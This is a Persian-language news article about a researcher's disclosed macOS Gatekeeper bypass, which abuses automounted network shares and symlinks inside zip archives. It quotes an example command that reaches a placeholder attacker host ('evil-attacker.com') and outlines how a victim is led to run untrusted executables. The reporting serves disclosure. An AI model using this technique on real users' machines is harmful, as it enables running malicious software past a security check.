آسیب پذیری gatekeeper یافته جدید محققان امنیت

آسیب پذیری gatekeeper ء | Filippo Cavallarin محقق امنیت به تازگی مطلبی به عنوان عبور از Gatekeeper در سیستم عامل مک منتظر کرده است. این آسیب پذیری حتی در به روز رسانی جدید که فته پیش منتشر شد ترمیم نشده است.

Gatekeeper یک ویژگی امنیتی است که اولین بار در OS X Mountain Lion معرفی شد و از نصب اپلیکیشن های مخرب یا بدون معرف جلوگیری میکند. زمانی که یک نرم افزار خارج از اپ استور دانلود می شود این ابزار وظیفه دارد تا بررسی کندکه آیا این نرم افزار توسط اپل تائید شده است یا نه. اگر تائید نشده باشد بدون اجازه مستقیم کاربر اجازه باز شدن نرم افزار را نمی دهد.

توضیح محقق

وی در وبلاگ خود نوشت نرم افزار هایی که از طریق درایوهای خارجی و یا شبکه ها نصب می شوند را به عنوان محل های امن می داند و به هیچ عنوان کد آن ها را چک نمی کند.

در ادامه او توضیح می دهد که: “اولین ویژگی که اجازه می دهد یک کاربر شبکه و یا یک درایو خارجی را متصل کند automount است.

برای مثال ‘ls /net/evil-attacker.com/sharedfolder/’ باعث می شود که سیستم عامل محتویات داخل  ‘sharedfolder’ را در سیستم حمله کننده شروع به خواندن کند.

دومین ویژگی zip archives است که می تواند لینکهایی داشته باشد که به لینک های خودسرانه و دلخواه منتهی می شود که و ابزاری که این فایل های زیپ را باز می کند به هیچ عنوان کنترلی انجام نمی دهد.”

او در این پست مثالی برای اینکه مسئله واضح تر شود نیز زده است:

“حمله کننده فایل زیپی که دارای یک لینک به نقطه automount که او بر آن کنترل دارد ایجاد کرده است و آن را به قربانی می فرستند.قربانی آن را دانلود می کند و روی لینک کلیک می کند. حال قربانی در محلی است که حمله کننده آن را کنترل می کند و Gatekeeper به آن اعتماد دارد. هر فایل قابل اجرایی از طرف حمله کننده قابل اجراست در عین طوری که finder طراحی شده است و اکستنشن ها را مخفی می کند (اکستنشن .app و همچنین آدرس محل اجرا را مخفی می کند.)”

وی اذعان می کند که این مشکل را به اپل در ۲۲ فوریه اطلاع داده است و قرار بود در به روز رسانی جدید به نسخه ۱۰.۱۴.۵ این آسیب پذیری را ترمیم کنند که این اتفاق نیافتاده است.

ویدئوی زیر نحوه استفاده از این آسیبپذیری را نشان می دهد: